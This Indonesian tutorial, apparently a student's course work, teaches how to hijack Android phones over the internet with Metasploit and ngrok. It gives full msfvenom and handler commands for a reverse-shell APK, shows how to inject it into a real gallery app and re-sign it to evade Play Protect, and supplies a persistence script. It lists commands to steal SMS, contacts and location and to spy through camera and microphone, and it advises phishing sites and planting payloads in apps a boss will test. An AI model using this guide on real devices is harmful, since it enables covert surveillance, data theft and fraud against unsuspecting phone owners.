UNTUK MENDAPATKAN AKSES MELALUI INTERNET
BAGAIMANA MENDAPATKAN AKSES BACKDOOR KITA MELALUI INTERNET ?
Setelah sebelumnya kita atelah mempelajari bagaimana cara mendapatkan akses backdoor
kita melalui jaringan lokal , sekarang kita akan mempelajari bagaimana mendapatkan akses
backdoor kita melalui jaringan internet (Tidak dalam satu jaringan lokal).
Untuk jaringan lokal , kita hanya memerlukan metasploit saja , namun untuk jaringan
internet , kita akan memerlukan Ngrok , lantas apa fungsi Ngrok disini ?. Ngrok disini digunakan
untuk memforward target yang membuka aplikasi backdoor kita , menuju jaringan lokal kita.
Sehingga kita bisa mendapatkan session meterpreter dengan menggunakan metasploit kita
walaupun kita berada di jaringan yang berbeda dengan IP yang berbeda. Langsung saja kita bahas
step by step untuk melakukannya.
BUKU TUTORIAL | 43
1. Pastikan kita sudah mempunyai Metasploit dan Ngrok , jika belum silahkan ikuti langkah
instalasi Metasploit pada point 2 , dan Ngrok pada point 3.
2. Buka Terminal dan jalankan Ngrok dengan cara , cd menuju direktori tempat instalasi Ngrok ,
dan ketikkan perintah.
./ngrok start -all
Pastikan kita sudah melakukan setting Ngrok sesuai langkah yang dijelaskan pada point 3.
3. Perhatikan alamat yang saya block dengan warna biru , alamat tersebut nantinya akan kita
gunakan sebagai LHOST dan LPORT ketika membuat payload. Portnya mungkin berbeda
beda , namun alamatnya sama . Intinya disini kita mengambil host dan port dari protokol tcp
terserah port 22 atau 8080.
4. Buka 1 Terminal lagi , dan arahkan ke direktori tempat kita menginstall metasploit.
5. Buat Payload , dengan menggunakan LHOST dan LPORT yang tadi kita tentukan
BUKU TUTORIAL | 44
6. Jika sudah , jalankan MSFconsole ,dengan cara mengetikkan perintah “msfconsole” pada
terminal , dan tunggu sampai msfconsole terbuka.
7. Ketikkan perintah “use exploit/multi/handler” pada msfconsole .
8. Kemudian ketikkan perintah “set PAYLOAD android/meterpreter/reverse_tcp”.
9. Selanjutnya kita set LHOST dan LPORTnya , Untuk LHOST isi dengan 0.0.0.0 dan untuk
LPORT isi dengan 4444 sesuai dengan LPORT pada ngrok tcp.
10. Selanjutnya kita ketikkan perintah “Exploit” pada msfconsole .

11. Disini metasploit sudah melakukan proses listening , tinggal menunggu target menginstall apk
backdoor yang kita buat.
12. Pastikan target menginstall apk backdoor yang kita buat.
BUKU TUTORIAL | 45
13. Pastikan target membuka apk backdoor yang kita buat.

14. Ketika target sudah membuka apk backdoor yang kita buat , ngrok akan merespon dan
menforward kepada metasploit kita , sehingga metasploit kita mendapatkan session
meterpreter.
15. Sampai disini kita sudah berhasil mendapatkan session meterpreter , dan kita bisa melakukan
berbagi macam hal . Seperti point sebelumnya , untuk hal yang bisa dilakukan ketika
mendapatkan sesi meterpreter akan kita bahas pada point berikutnya.
BUKU TUTORIAL | 46
BUKU TUTORIAL | 47
7
HAL YANG BISA DILAKUKAN SETELAH MENDAPATKAN
AKSES BACKDOOR
APA SAJA YANG BISA DILAKUKAN KETIKA KITA BERHASIL MENDAPATKAN

SESI METERPRETER ?
Setelah sebelumnya kita mengetahui cara membuat backdoor dan mendapatkan akses dari
backdoor aplikasi android yang kita buat. Sekarang kita akan mempelajari tentang hal apa saja
yang bisa kita lakukan setelah kita mendapatkan sesi meterpreter .
BUKU TUTORIAL | 48
Untuk Hal-Hal yang bisa dilakukan sebenarnya kita bisa melihat pada msfconsole setelah
kita berhasil mendapatkan sesi meterpreter dengan cara mengetikkan perintah “help”. maka akan
tampil informasi perintah terkait sesi meterpreter.
Berikut adalah daftar perintah dan penjelasannya :
Core Command
Perintah Deskripsi
? Menampilkan menu bantuan
Background Memindahkan session saat ini ke background
Bg Nama alias untuk background
bgkill Kill/menghapus background meterpreter session
bglist Daftar list background script yang sedang berjalan
bgrun Eksekusi meterpreter script sebagai background thread
channel Menampilkan informasi atau mengatur channel yang sedang aktif
close Menutup channel
disable_unicode_encoding MenDisable encoding untuk unicode string
enable_unicode_encoding MenEnable encoding untuk unicode string
exit Mengakhiri meterpreter session
get_timeout Mendapatkan waktu timeout untuk session yang sedang berjalan
BUKU TUTORIAL | 49
guid Mendapatkan session UID
irb Membuka ruby shell interaktif pada session yang saat ini sedang
berjalan
load MeLoad meterpreter session baru
Machine _id Mendapatkan MSF ID dari machine yang di sisipkan pada session
Pry Membuka Pry debugger pada session saat ini
quit Mengakhiri meterpreter session
read Membaca data dari channel
run Mengeksekusi meterpreter script atau post module
secure Re-Negotiate enksipsi paket TLV pada session
session Berpindah ke session yang lain
sleep Memaksa meterpreter untu diam, dan menstabilkan session
transport Mengubah mekanisme transport
use Perintah pengganti untuk Load
uuid Mendapatkan nilai UUID untuk session saat ini
write Menulis data pada channel
BUKU TUTORIAL | 50
Stdapi : File System Commands
Perintah Deskripsi
cat Membaca konten file ke layar
cd Mengubah direktori
checksum Mengambil nilia checksum dari sebuah file
cp Copy file ke tempat yang dituju
dir Menampilkan daftar list file (sama dengan perintah “ls”)
download Melakukan download file atau direktori ke komputer
getlwd Menampilkan direktori lokal yang sedang bekerja/dibuka
getwd Menampilkan direktori yang sedang bekerja/dibuka
lcd Mengubah direktori lokal yang sedang bekerja/dibuka
lls Menampilkan daftar file lokal
lpwd Menampilkan direktori lokal yang sedang bekerja/dibuka
ls Menampilkan daftar file
mkdir Membuat direktori
mv Memindahkan file/direktori ke tempat tujuan
pwd Menampilkan direktori yang saat ini sedang dibuka
BUKU TUTORIAL | 51
rm Menghapus file
rmdir Menghapus direktori
search Mencari file
upload Mengupload file atau direktori
Stdapi: Networking commands
Perintah Deskripsi
Ifconfig Menampilkan Interface
ipconfig Menampilkan interface
portfwd Melakukan forwarding local port menuju remote service
route Melihat dan memodifikasi routing table
Stdapi: System Commands
Perintah Deskripsi
execute Mengeksekusi perintah
getuid Mendapatkan user id
Localtime Mendapatkan waktu dan tanggal pada target system
BUKU TUTORIAL | 52
pgrep Melakukan filter proses berdasarkan nama
Ps Menampilkan daftar proses yang sedang berjalan
shell Beralih ke mode system command shell
sysinfo Menampilkan informasi tentang remote system
Stdapi : User Interface Commands
Perintah Deskripsi
Screenshare Melihat aktifitas yang dilakukan remote user pada layar

Handphonenya secara real time.
Screenshot Mangambil screenshot dari aktivitas yang dilakukan pada layar

user
Stdapi : Webcam Commands
Perintah Deskripsi
record_mic Merekam audio dari microphone default user dalam kurun waktu
tertentu.
webcam_chat Memulai webcam video chat
webcam_list Menampilkan daftar webcam yang tersedia pada handphone user
BUKU TUTORIAL | 53
webcam_snap Mengambil snapshot dari webcam user (kamera depan / belakang)
webcam_stream Menampilkan video stream dari webcam user
Stdapi: Audio Output Commands
Perintah Deskripsi
play Memainkan sebuah audio file pada sistem target
Android Commands
Perintah Deskripsi
activity_start Memulai sebuah activity android dari sebuah Uri String
check_root Check apakah device sudah dalam keadaan root
dump_calllog Mendapatkan history panggilan pada handphone target
dump_contact Mendapatkan daftar contact pada handphone target
dump_sms Mendapatkan daftar sms pada handphone target
geolocate Mendapatkan titik koordinat posisi target Lat – Long
hide_app_icon Menyembunyikan ikon dari sebuah aplikasi dari launcher
send_sms Mengirim sms
BUKU TUTORIAL | 54
set_audio_mode Mengubah mode handphone target ke mode berdering
sqlite_query Menjalankan query dari sqlite database dari direktori penyimpanan
wakelock MenEnable/MenDisable Wakelock
wlan_geolocate Mendapatkan titik koordinat target dengan menggunakan informasi

WLAN
Application Controller Commands
Perintah Deskripsi
app_install Menginstall apk file tertentu
app_list Menampilkan daftar aplikasi yang diinstall pada devices
app_run Menjalankan aplikasi berdasarkan package name
app_uninstall Menguninstall aplikasi
BEBERAPA CONTOH PENGGUNAAN
Berikut ini adalah beberapa contoh penggunaan , disini kami hanya menyontohkan sebagian
perintah saja.
Sysinfo
meterpreter > sysinfo
Computer : localhost
OS : Android 9 - Linux 4.4.190-KangarooX-whyred-r5.1 (aarch64)
BUKU TUTORIAL | 55
Meterpreter : dalvik/android
Geolocate
meterpreter > geolocate
[*] Current Location:
Latitude: -7.0814984
Longitude: 111.9155463
To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=-

7.0814984,111.9155463&sensor=true
Kita bisa melihat lokasi target dengan membuka googlemap dan memasukkan titik
koordinat target
dump_sms
meterpreter > dump_sms
[*] Fetching 777 sms messages
[*] SMS messages saved to: sms_dump_20200617162738.txt
Untuk hasil dumpnya kita bisa melihat pada folder “metasploit/app”
BUKU TUTORIAL | 56
dump_contacts
meterpreter > dump_contacts
[*] Fetching 307 contacts into list
[*] Contacts list saved to: contacts_dump_20200617163115.txt
Untuk hasil dumpnya kita bisa melihatnya pada folder “metasploit/app” , maka akan
ditampilkan daftar kontak berupa nama dan nomor hp.
app_list dan app_run
Ketika kita memasukkan perintah app_list maka akan ditamplikan semua aplikasi beserta
nama packagenya. Seperti sebagai berikut :
BUKU TUTORIAL | 57
Untuk menjalankannya kita tinggal ketikkan perintah app_run <nama Package>. Maka
aplikasi yang kita tuju akan terbuka pada handphone target. Contoh :
meterpreter > app_run com.uniu.dance.happy.id
[+] Main Activty for 'com.uniu.dance.happy.id' has started.
Setelah itu pada handphone target , aplikasi dengan package yang kita tuju akan otomatis
terbuka
Mungkin Cukup itu saja sebagian contoh penggunaan command ketika kita sudah
mendapatkan sesi meterpreter. Selebihnya kita bisa mencoba-coba perintah yang lain sendiri.
Selanjutnya kita akan mempelajari bagaimana cara menyisipkan payload kita ke aplikasi android
lain.
BUKU TUTORIAL | 58
8
INJECTING BACKDOOR PAYLOAD KEDALAM APLIKASI
ANDROID LAIN
KENAPA KITA HARUS MENGINJECTKAN PAYLOAD KITA KE APLIKASI LAIN ?
Setelah kita membuat payload , payload kita memang bisa di install dan dibuka pada
handphone target , namun payload kita terlalu mencurigakan dikarenakan tidak ada launcher atau
tampilan apapun pada payload kita , maka dari itu kita perlu melakukan inject/Bind payload kita
ke aplikasi android lain , agar payload yang kita buat tidak terlihat mencurigakan.
HAL HAL YANG DIBUTUHKAN SEBELUM INJECTING PAYLOAD
Ada beberapa hal yang harus disiapkan sebelum kita melakukan injecting payload kedalam
aplikasi android lain , hal – hal yang perlu disiapkan antara lain .
1. Siapkan Apk target / apk yang nantinya akan kita sisipi payload backdoor kita .
BUKU TUTORIAL | 59
2. Install tool ApkTool , tool ini nantinya akan digunakan untuk proses compile dan
decompile Apk. Untuk link download dan cara installnya bisa dilihat pada website berikut.
https://ibotpeaches.github.io/Apktool/install/
3. Pastikan java yang terinstall pada komputer kita sudah versi yang paling terakhir
BAGAIMANA CARA MELAKUKAN INJECTING PAYLOAD KE APLIKASI ANDROID

LAIN ?
Setelah hal – hal yang diperlukan sudah disiapkan , selanjutnya kita bisa mulai tahap injectingnya.
1. Download aplikasi yang akan digunakan sebagai tempat menampung payload kita , saya
sarankan aplikasi yang ringan dan cukup sederhana saja. Disini saya memilih aplikasi
Galery karena cukup sederhana , untuk aplikasinya bisa didownload di
https://apkpure.com/id/gallery/photography.blackgallery.android.
2. Tentukan direktori tempat file apk target dan file output payload kita nanti. Disini saya
memilih untuk meletakkannya di desktop “home/widi/Desktop”
3. Pindahkan file apk target tadi ke direktori yang ditentukan
BUKU TUTORIAL | 60
4. Ubah nama file apk target menjadi lebih sederhana , agar bisa dibaca oleh terminal
nantinya.
Disini saya merubah nama yang sebelumnya adalah “Gallery_v2.3.93_apkpure.com.apk”

menjadi “Galery.apk”
5. Buka terminal sebagai root dan arahkan ke direktori tempat kita menginstall metasploit
6. Tambahkan path lokasi tempat kita menginstall apktool , contohnya pada folder “usr/bin”
, maka tambahkan dengan cara mengetik perintah “export PATH=$PATH:/usr/bin”
7. Ketikkan perintah “apktool empty-framework-dir –force” , untuk menghapus file direktori

framework pada apk tool .
8. Kemudian jalankan perintah “msfvenom -x <lokasi file apk target> -p

android/meterpreter/reverse_tcp LHOST=<listen host> LPORT=<listen port> R -o <lokasi
output file apk hasil inject>.
Contoh :
root@widi:/opt/metasploit/app# msfvenom -x /home/widi/Desktop/Galery.apk -p

android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=18649 R -o
/home/widi/Desktop/Gallery_Injected.apk
BUKU TUTORIAL | 61
9. tunggu proses injecting payload
10. Hasil eksekusi perintah diatas adalah sebagai berikut :
root@widi:/opt/metasploit/app# msfvenom -x /home/widi/Desktop/Galery.apk -p

android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=18649 R -o
/home/widi/Desktop/Gallery_Injected.apk
Using APK template: /home/widi/Desktop/Galery.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the

payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package photography.blackgallery.android.remaf
[*] Loading /tmp/d20200618-9743-

n74rr4/original/smali/photography/blackgallery/android/ApplicationClass.smali and
injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission

android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
BUKU TUTORIAL | 62
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>

android:name="android.permission.ACCESS_FINE_LOCATION"/>

android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>

android:name="android.permission.READ_CONTACTS"/>

android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>

android:name="android.permission.CHANGE_WIFI_STATE"/>

android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>

android:name="android.permission.READ_CALL_LOG"/>

android:name="android.permission.SET_WALLPAPER"/>

android:name="android.permission.WRITE_CALL_LOG"/>
BUKU TUTORIAL | 63
[*] Rebuilding /home/widi/Desktop/Galery.apk with meterpreter injection as

/tmp/d20200618-9743-n74rr4/output.apk
[*] Signing /tmp/d20200618-9743-n74rr4/output.apk
[*] Aligning /tmp/d20200618-9743-n74rr4/output.apk
Payload size: 8456168 bytes
Saved as: /home/widi/Desktop/Gallery_Injected.apk
11. Setelah proses injecting selesai kita bisa melihat hasilna pada direktori yang kita tentukan.
Disini saya menentukan output pada direktori “/home/widi/Desktop/Gallery_Injected.apk”
12. Setelah itu kita jalankan msfconsole.
13. Ketikkan perintah seperti point sebelumnya , ketika kita ingin mendapatkan akses backdoor
melalui internet
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 0.0.0.0
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit
14. Setelah itu kita tinggal melakukan social enginering untuk mengirim file hasil inject kita
ke Handphone target.
15. Pastikan target menginstall dan membuka file apk backdoor kita.
BUKU TUTORIAL | 64
16. Setelah itu kita akan mendapatkan akses session meterpreter dari handphone target.
BUKU TUTORIAL | 65
Sekarang kita sudah berhasil menginjectkan backdoor payload kita pada aplikasi android
lain menggunakan metasploit . Namun semua itu metasploit yang melakukan dengan otomatis.
Lalu bagaimana sebenarnya cara kerja proses inject payload backdoor kita ke aplikasi lain
BAGAIMANA SEBENARNYA CARA KERJA PROSES INJECTING PAYLOAD ?
Setelah sebelumnya kita berhasil melakukan inject payload dengan metasploit , sekarang
kita akan belajar cara kerja atau proses sebenarnya dari proses injecting tersebut. Berikut
1. File apk target dan file payload dari metasploit didecompile , disini saya akan melakukan
decompiling dengan menggunakan apktool.
Disini saya mendecompile dan meletakkannya pada folder inject
2. Pada direktori “inject/target/smali/com” dibuatkan folder “metasploit/stage” , kemudian

pada direktori “inject/payload/smali/com/metasploit/stage” , file Payload.smali di copy ke
direktori “metasploit/stage” pada direktori target.
BUKU TUTORIAL | 66
3. Buka file AndroidManifest.xml pada direktori target , lalu kita cari file activity yang
dijadikan sebagai launcher pada aplikasi target.
Bisa kita lihat activity yang dijadikan launcher adalah SlidingDrawer , pada aplikasi lain
namanya akan berbeda beda
4. Kita cari dan buka file smali dari activity yang dijadikan sebagai launcher pada direktori
target/smali/ di aplikasi ini bernama SlidingDrawer.smali
5. Cari line yang mengandung kata “;→onCreate(Landroid/os/Bundle;)V”
6. Tambahkan perintah
invoke-static {p0}, Lcom/metasploit/stage/Payload;→start(Landroid/content/Context;)V
BUKU TUTORIAL | 67
7. Simpan file smali tersebut.
8. Buka Android Manivest dari direktori payload dan target , kemudian bandingkan <uses-
permission>nya , tambahkan uses permission yang belum ada dari AndroidManifest
payload ke AndroidManifest target.
9. Compile direktori target.
10. Buat sertifikat yang nantinya akan digunakan untuk menandai apk yang telah dicompile
tadi
BUKU TUTORIAL | 68
11. Gunakan sertifikat tadi untuk menandai apk yang telah dicompile . Disini saya
menggunakan jarsigner untuk menandai apk. Kenapa apk harus diberi sign/tanda ?. Karena
jika tidak ada tandanya , android tidak akan mau menginstall apk tersebut . Karena apknya
dianggap tidak terpercaya. Untuk perintahnya pada jarsigner adalah sebagai berikut .
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore

/home/widi/Desktop/key.keystore <nama apk target yang akan dipasang sertifikat>
<nama alias sertifikat>
12. Selanjutnya kita gunakan zipalign itun memverifikasi sertifikat dan mengcompressnya
dengan perintah :
zipalign -v 4 <Apk target yang sudah dipasang sertifikat> <nama apk setelah nanti
diverifikasi>
BUKU TUTORIAL | 69
13. Sampai disini proses injecting sudah berhasil.
Jadi begitulah sebenarnya yang terjadi pada proses injecting yang dilakukan metasploit
secara otomatis.
BUKU TUTORIAL | 70
9
MENGATASI APK TERDETEKSI TIDAK AMAN UNTUK
DIINSTAL
MENGAPA APK YANG KITA BUAT TERDETEKSI TIDAK AMAN ?
Setelah kita berhasil membuat payload dan bahkan menginjectkan payload backdoor kita
ke aplikasi android lain , terkadang aplikasi kita akan terdeteksi tidak aman. Terutama oleh google
Play Protect, lantas apa yang menyebabkan hal itu terjadi.
BUKU TUTORIAL | 71
Biasanya itu terjadi kebanyakan karena proses “Signing” atau penandatanganan sertifikat
ketika kita membuat apk. Walaupun pada proses pembuatan apk metasploit sudah melakukan
signing . Namun kadang proses signingnya tidak sempurna, jadi kita perlu melakukan proses
signing secara manual
BAGAIMANA CARA MELAKUKAN SIGNING SECARA MANUAL ?
Walaupun ketika pembuatan dan injecting payload metasploit sudah melakukan proses
signing , namun adakalanya kita melakukan signing ulang secara manual. Lalu bagaimana caranya
? . Berikut adalah cara melakukan Signing secara manual :
Cara 1 :
1. Pastikan kita sudah menginstall zipalign.
2. Ketikka perintah “keytool -genkey -V -keystore <Output keystore format .jks / .keystore>
-alias <Nama alias untuk keystore> -keyalg RSA -keysize 2048 -validity 1000”
BUKU TUTORIAL | 72
3. Ikuti langkah pembuatan Keystore
4. Kita sudah membuat keystore yang akan digunakan untuk menandatangani atau melakukan
Signing pada aplikasi kita nanti. Disini saya memberi nama key.keystore dengan alias Widi
5. Selanjutnya kita lakukan signing dengan menggunakan jarsigner dengan perintah

“jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore
/home/widi/Desktop/<key.jks/key.keystore> <apk yang akan diberi sign> <alias dari
keystore>” , kemudian masukkan password.
6. Selanjutnya kita kita lakukan tahap aligning. Dengan cara mengetikkan perintah : “zipalign
-v 4 Gallery_Injected.apk Galery_Injected_signed.apk”
Cara 2:
Jika setelah kita menggunakan cara 1 , namun apk masih terdeteksi tidak aman, kita bisa
menggunakan cara 2. yaitu dengan menggunakan aplikasi pada smartphone android yang bernama
mixexplorer. Berikut adalah caranya :
1. Download dan install MixExplorer , pada link berikut
https://www.mediafire.com/file/42hzjanvnn3sklf/com.mixplorer_v6.44.1-
20043010_Android-2.0.apk/file
BUKU TUTORIAL | 73
2. Setelah kita download dan install buka dan cari aplikasi yang kita buat tadi.
3. Lalu kita klik tahan pada apk buatan kita , Klik simbol titik 3 pada pojok kanan atas , lalu
pilih menu “Sign”
4. maka aplikasi kita akan ditambahkan ke task list. Selanjutnya kita klik task list , lalu kita
klik task dari apk yang mau kita tanda tangani.
BUKU TUTORIAL | 74
5. Maka akan muncul beberapa pilihan . Pilih PLATFORM.
6. Tunggu proses Signing selesai .
BUKU TUTORIAL | 75
7. Kita telah berhasil melakukan Signing pada aplikasi kita.
Setelah kita berhasil melakukan Signing kita bisa melakukan social enginering dan mulai
membagikan aplikasi backdoor yang telah kita buat tadi. Namun sebelum itu kita akan
mempelajari tentang bagaimana cara pembuatan persistence backdoor
BUKU TUTORIAL | 76
10
MEMBUAT PERSISTANCE BACKDOOR
APA ITU PERSISTENCE BACKDOOR ?
kita telah berhasil mengeksploitasi sistem kita dapat mempertimbangkan untuk

menempatkan Persistence Backdoor agar dapat terhubung dengan mudah dengan target. Misalnya
jika pengguna menutup aplikasi atau menguninstall aplikasi yang rentan di sistemnya maka kita
perlu untuk mencari cara alternatif untuk mendapatkan kembali akses ke sistem jarak jauh. Itulah
sebabnya Persistence Backdoor penting karena mereka dapat mempertahankan akses ke sistem
yang kita tuju.
Jadi Persistence backdoor bisa diartikan sebagai pintu belakang yang selalu terbuka , yang
membuat kita bisa keluar masuk kedalam sistem. Sehingga walaupun target sudah menutup
aplikasi yang kita buat , ataupun merestart handphone android . kita masih bisa mendapatkan akses
lagi ketika target sudah menyalakan devicenya.
BUKU TUTORIAL | 77
BAGAIMANA CARA MEMBUAT PERSISTENCE BACKDOOR ?
Setelah kita berhasil mendapatkan sesi meterpreter di handphone target . Ada langkah
penting yang harus dilakukan , yaitu menyisipkan persistence backdoor agar kita nantinya bisa
terhubung kembali dengan target. Bagaimana caranya ? , berikut adalah cara menyisipkan
persistence backdoor :
1. Dapatkan sesi meterpreter dengan target (disini kami anggap semuanya sudah bisa
mendapatkan akses dari payload backdoor yang dibuat/sudah mendapatkan sesi
meterpreter). Disini saya sarankan buat apk payload sederhana tanpa diinjectkan ke apk
lain , cukup payload apk dan jangan lupa memberinya Sign dengan mixplorer,
2. Buat file dengan text editor apapun dengan nama “autorun.sh”
3. Ketikkan kode berikut pada autorun.sh
#!/bin/sh
while :
do am start --user 0 -a android.intent.action.MAIN -n

com.metasploit.stage/.MainActivity
sleep 10
done
Jika sudah , maka simpanlah.
4. Pada msfconsole , ketikkan perintah “cd /sdcard” lalu ketikkan perintah “ls”.
5. Maka console akan memindahkan kita ke direktori sdcard atau biasanya

storage/emulated/0 , dan menampilkan list file yang ada pada folder tersebut.
BUKU TUTORIAL | 78
6. Selanjutnya kita akan melakukan upload file autorun.sh yang kita buat tadi dengan cara
mengetikkan perintah “upload <direktori tempat autorun sh>” contoh “upload
/home/widi/Desktop/autorun.sh”
7. Setelah upload , pastikan file sudah benar-benar ada pada direktori android korban dengan
mengetikkan perintah “ls” sekali lagi.
8. Selanjutnya kita ketikkan perintah “shell” pada msfconsole untuk beralih ke shell mode
BUKU TUTORIAL | 79
9. Ketikkan perintah nohup sh autorun.sh
10. Kita bisa melihat bahwa intent selalu dieksekusi setiap 10 detik .
11. Sampai disini kita sudah berhasil membuat persistence backdoor. Jadi walaupun backdoor
kita sudah di force close atau target offline untuk beberapa saat kita masih bisa terhubung
kembali dengan target.
BUKU TUTORIAL | 80
Cara ini akan gagal ketika target merestart handphone androidnya. Kecuali untuk
handphone android dengan akses root. Untuk handphone android dengan akses root , pada langkah
4 , kita ubah direktori “/sdcard” menjadi direktori “etc/init.d” dan kita jalankan perintah nohup.
Maka ketika android direstart android akan langsung mengeksekusi ulang perintah pada
autorun.sh.
BUKU TUTORIAL | 81
11
SOCIAL ENGINERING AGAR TARGET MENGINSTALL
PAYLOAD
APA ITU SOCIAL ENGINERING ?
Social engineering merupakan istilah yang digunakan untuk berbagai tindak kejahatan
yang dilakukan dengan memanfaatkan interaksi dengan manusia. Teknik ini menggunakan
manipulasi psikologis untuk menipu korban agar mereka melakukan kesalahan keamanan dan
memberikan informasi sensitif.
Social engineering sering digunakan oleh para hacker untuk mendapat informasi penting
karena mereka memahami bahwa manusia atau user menjadi rantai terlemah pada sistem
BUKU TUTORIAL | 82
keamanan jaringan. Meskipun Anda telah membangun sistem keamanan yang baik, namun jika
dioperasikan oleh user yang tidak kompeten, sistem tetap bisa dengan mudah diserang oleh hacker.
Dalam melakukan serangan, hacker memiliki beberapa metode yang digunakan.
METODE SOCIAL ENGINERING
Berikut beberapa metode yang biasanya digunakan dalam social engineering untuk
pembajakan android dengan aplikasi backdoor payload :
PHISING
Phishing menjadi jenis serangan paling umum dalam social engineering. Hacker
akan menggunakan email yang berisi pesan palsu dan link berbahaya untuk memancing
korban agar memberikan informasi penting. Agar korban percaya, hacker akan menulis
pesan semirip mungkin dengan perusahaan resmi. Pesan juga akan ditulis dengan bahasa
yang mampu menimbulkan rasa urgensi sehingga korban akan membuka link berbahaya
dan memberikan data sensitif seperti user id, password, atau data penting lainnya. Jika
Anda menemukan email yang mencurigakan sebaiknya hindari untuk membuka
attachment atau link di dalamnya karena hacker juga bisa mengirim malware melalui email
tersebut.
Dalam hal ini , kita bisa melakukan rekayasa social dengan membuat sebuah web
palsu dengan tampilan menarik agar target melakukan download aplikasi yang kita buat
dan menginstallnya. Dengan menggunakan Ngrok kita bisa melakukan forwarding dari
website yang kita buat pada localhost agar berjalan dan bisa diakses melalui internet
melalui protocol Http yang disediakan oleh ngrok. Lalu kita tinggal menyebar jarring
dengan cara membagikan link ngrok , akan lebih baik jika linknya kita perpendek dengan
shortener yang disediakan oleh google.
WHALLING ATTACK
BUKU TUTORIAL | 83
Whalling attack merupakan jenis serangan phishing yang mengincar korban dengan
jabatan yang lebih tinggi atau memiliki peran penting di perusahaan. Teknik ini
mengadopsi teknik yang sama dengan email phishing, yang membedakan adalah target
yang diserang. Email dibuat menyerupai email bisnis penting yang dikirim oleh otoritas
resmi. Untuk melakukan metode ini, hacker membutuhkan lebih banyak penelitian dan
perencanaan daripada metode phishing biasa. Mereka harus mencari banyak informasi
terkait profil perusahaan atau target, agar email lebih mudah dipercaya oleh user yang akan
diserang.
Dalam hal ini mungkin jika kita bekerja sebagai orang yang membuat aplikasi
android kita bisa menyisipkan payload ke aplikasi yang kita buat yang nantinya akan diuji
oleh atasan tentunya. Dan ketika atasan mengeksekusi aplikasi yang kita buat. Kita akan
berhasil mendapatkan sesi meterpreter dadi atasan dan mengambil data yang kita inginkan.
PRETRXTING
Dalam metode pretexting, hacker akan membuat skenario palsu untuk mencuri data
pribadi korban. Serangan ini bisa dilakukan melalui telpon atau email dan social media.
Hacker akan berpura-pura menjadi petugas bank, petugas lembaga negara, rekan kerja, atau
bahkan staff IT perusahaan yang sedang membutuhkan info dari korban untuk tugas urgent.
Keberhasilan pretexting ini tergantung dari kemampuan hacker dalam membangun
kepercayaan dengan korban.
BUKU TUTORIAL | 84
DAFTAR PUSTAKA
Alan. 2020. What is Ngrok . https://ngrok.com/product (diakses tanggal 15 Juni 2020)
Bouman , Roland. 2007. Memulai Dengan Metasploit. https://www.metasploit.com/get-started

(diakses tanggal 15 Juni 2020)
Chao, Stephen dan Mike Geodecke. 2015 . Embed a Metasploit Payload in an Original .Apk File.
https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-
do-manually-0167124/ (diakses tanggal Juni 17 2020)
Chao, Stephen dan Mike Geodecke. 2015 . Create a Persistent Back Door in Android Using Kali
Linux: .https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-
kali-linux-0161280/ (diakses tanggal 17 Juni 2020)
K, Yasin. 2018. Apa Itu Backdoor Dan Bagaimana Cara Menanganinya .

https://www.niagahoster.co.id/blog/apa-itu-backdoor/ (diakses tanggal 15 Juni 2020)
Nkd, Feradhita. 2019. Metode-metode yang Digunakan dalam Serangan Social Engineering
.https://www.logique.co.id/blog/2019/09/03/serangan-social-engineering/ (diakses tanggal 17
Juni 2020).
Vonny , Zahra. 2019 . Pengertian Metasploit

https://zahraynmocca.blogspot.com/2019/12/pengertian-metasploit.html (diakses tanggal 15 Juni
2020).
BUKU TUTORIAL | 85

Pembajakan Android Melalui Internet Dengan Menggunakan Metasploit Dan Ngrok

Diunggah oleh

Informasi Dokumen

Deskripsi Asli:

Judul Asli

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

Pembajakan Android Melalui Internet Dengan Menggunakan Metasploit Dan Ngrok

Diunggah oleh

Hak Cipta:

Format Tersedia

2020

WIDIANTO EKA SAPUTRO | 170411100074

1. Nama Mahasiswa : Widianto Eka Saputro (170411100074)

Bangkalan, 9 April 2020

Telah diperiksa dan diuji oleh Pembimbing ‘

Dosen Penguji, Dosen Pembimbing,

Husni, S.Kom., M.T. Rosidah Vivin Nahari, S.Kom., M.T.

Yoga Dwitya Pramudita, S.Kom., M.Cs.

Widianto Eka Saputro

PENGANTAR PENETRATION TESTING .................................................................................. 8

APA ITU PENETRATION TESTING ? .................................................................................... 8

APA SAJA LANGKAH – LANGKAH DALAM PENETRATION TESTING ? ..................... 8

APA HUBUNGAN PENETRATION TESTING DENGAN TUTORIAL PADA BUKU ?..... 9

PENGENALAN METASPLOIT .................................................................................................. 10

TENTANG METASPLOIT ...................................................................................................... 10

JENIS-JENIS METASPLOIT .................................................................................................. 11

KELEBIHAN DAN KEKURANGAN METASPLOIT ........................................................... 12

METASPLOIT INTERFACE ................................................................................................... 13

DOWNLOAD METASPLOIT ................................................................................................. 16

CARA INSTALL METASPLOIT PADA SISTEM OPERASI WINDOWS .......................... 18

CARA INSTALL METASPLOIT PADA LINUX MINT ....................................................... 22

